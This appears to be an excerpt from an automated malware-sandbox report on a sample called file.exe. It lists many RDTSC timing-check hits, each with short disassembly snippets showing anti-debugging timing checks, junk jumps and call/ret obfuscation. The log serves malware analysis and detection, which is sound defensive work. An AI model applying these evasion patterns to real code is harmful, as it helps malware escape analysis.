                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2A5D second address: DA2A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2A61 second address: DA2A67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3324 second address: DA3335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3335 second address: DA333B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA31E6 second address: DA31EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA333B second address: DA333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA333F second address: DA3343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3343 second address: DA3370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F0F70ECA9ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F70ECA9B5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6DEA second address: DA6DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6DEE second address: DA6DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4BA1 second address: DA4BAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4BAB second address: DA4BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA77E0 second address: DA77EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0F7085C596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8169 second address: DA816D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA816D second address: DA8173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8173 second address: DA817A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA817A second address: DA8200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0F7085C5A2h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F0F7085C598h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b and esi, 72B07213h 0x00000031 push 00000000h 0x00000033 mov esi, 0FFA026Ch 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a jmp 00007F0F7085C5A5h 0x0000003f jmp 00007F0F7085C5A5h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jng 00007F0F7085C59Ch 0x0000004e jnl 00007F0F7085C596h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8200 second address: DA820A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0F70ECA9A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8BF2 second address: DA8BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8BF8 second address: DA8C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F70ECA9A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABD2B second address: DABD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACCB2 second address: DACCF6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0F70ECA9A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+1246FD71h], ecx 0x0000002e mov ebx, dword ptr [ebp+122D18D0h] 0x00000034 push 00000000h 0x00000036 cld 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACCF6 second address: DACD0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACD0C second address: DACD12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACD12 second address: DACD3B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F7085C5A8h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACD3B second address: DACD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACD3F second address: DACD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACD45 second address: DACD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAED8E second address: DAED92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAFE55 second address: DAFE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAFE59 second address: DAFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAFE5F second address: DAFE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F70ECA9A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0DC9 second address: DB0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0DCD second address: DB0DD3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA896A second address: DA896F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA896F second address: DA8982 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F0F70ECA9A6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1E41 second address: DB1E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1E45 second address: DB1E61 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F70ECA9ADh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1E61 second address: DB1E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9517 second address: DA951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3E30 second address: DB3E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3E36 second address: DB3E45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3E45 second address: DB3E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3E4B second address: DB3EF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0F70ECA9AAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F0F70ECA9B2h 0x00000011 mov edi, 1B615EF4h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 jmp 00007F0F70ECA9ACh 0x0000001e add ebx, 43AE4EB8h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F0F70ECA9A8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 add dword ptr [ebp+12466F48h], edx 0x00000046 jns 00007F0F70ECA9BDh 0x0000004c mov edi, eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0F70ECA9B4h 0x00000055 push esi 0x00000056 jl 00007F0F70ECA9A6h 0x0000005c pop esi 0x0000005d popad 0x0000005e push eax 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4DC0 second address: DB4DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4DC6 second address: DB4E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F70ECA9A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+1246BCC9h] 0x00000029 jmp 00007F0F70ECA9B5h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122DB99Eh], eax 0x00000036 push 00000000h 0x00000038 xchg eax, esi 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4E1C second address: DB4E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5DCD second address: DB5DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5DDF second address: DB5DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5DE6 second address: DB5DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F70ECA9A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACE7E second address: DACF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 mov edi, dword ptr [ebp+122D295Fh] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F0F7085C598h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 jg 00007F0F7085C59Ch 0x0000003d jnc 00007F0F7085C5A2h 0x00000043 mov eax, dword ptr [ebp+122D15A1h] 0x00000049 mov dword ptr [ebp+12465A99h], esi 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push edi 0x00000054 call 00007F0F7085C598h 0x00000059 pop edi 0x0000005a mov dword ptr [esp+04h], edi 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc edi 0x00000067 push edi 0x00000068 ret 0x00000069 pop edi 0x0000006a ret 0x0000006b pushad 0x0000006c sub edi, dword ptr [ebp+122D2E56h] 0x00000072 mov ebx, dword ptr [ebp+122D1B1Ah] 0x00000078 popad 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push edx 0x0000007d jng 00007F0F7085C596h 0x00000083 pop edx 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF22 second address: DACF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF02B second address: DAF050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b ja 00007F0F7085C5B0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F7085C5A2h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7E27 second address: DB7EA7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F0F70ECA9B3h 0x00000010 jmp 00007F0F70ECA9ADh 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F0F70ECA9B0h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F0F70ECA9A8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F0F70ECA9A8h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push esi 0x00000059 ja 00007F0F70ECA9A6h 0x0000005f pop esi 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADF9E second address: DADFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F7085C5A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADFB3 second address: DADFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F0F70ECA9B6h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9D51 second address: DB9D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBACCC second address: DBAD13 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F70ECA9ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jl 00007F0F70ECA9A6h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 nop 0x00000016 movsx edi, si 0x00000019 push 00000000h 0x0000001b mov bx, dx 0x0000001e push 00000000h 0x00000020 movsx ebx, ax 0x00000023 mov ebx, eax 0x00000025 xchg eax, esi 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F70ECA9B8h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4157 second address: DB415C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB701E second address: DB7022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7FB2 second address: DB7FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7FB6 second address: DB7FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9ED4 second address: DB9ED9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAEEA second address: DBAEF8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAEF8 second address: DBAEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAF8D second address: DBAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAF91 second address: DBAF9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAF9B second address: DBAF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE9B1 second address: DBE9B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2ABC second address: DC2AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0F70ECA9A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F0F70ECA9A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2AD3 second address: DC2ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0F7085C596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2446 second address: DC245A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9AAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2585 second address: DC259B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC259B second address: DC25A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F70ECA9AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC25A5 second address: DC25AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC769C second address: DC76A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC76A0 second address: DC76A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC76A4 second address: DC76B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC76B2 second address: DC76B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC76B9 second address: DC76BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC9BF second address: DCC9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCC9C3 second address: DCC9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCCCD1 second address: DCCD06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F0F7085C59Eh 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F0F7085C596h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCCF83 second address: DCCF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F0F70ECA9ACh 0x0000000c jc 00007F0F70ECA9A6h 0x00000012 ja 00007F0F70ECA9ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCD0CE second address: DCD0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F7085C596h 0x0000000a js 00007F0F7085C596h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F13 second address: D63F2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F2A second address: D63F34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F7085C59Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F34 second address: D63F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F70ECA9B3h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD299C second address: DD29A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
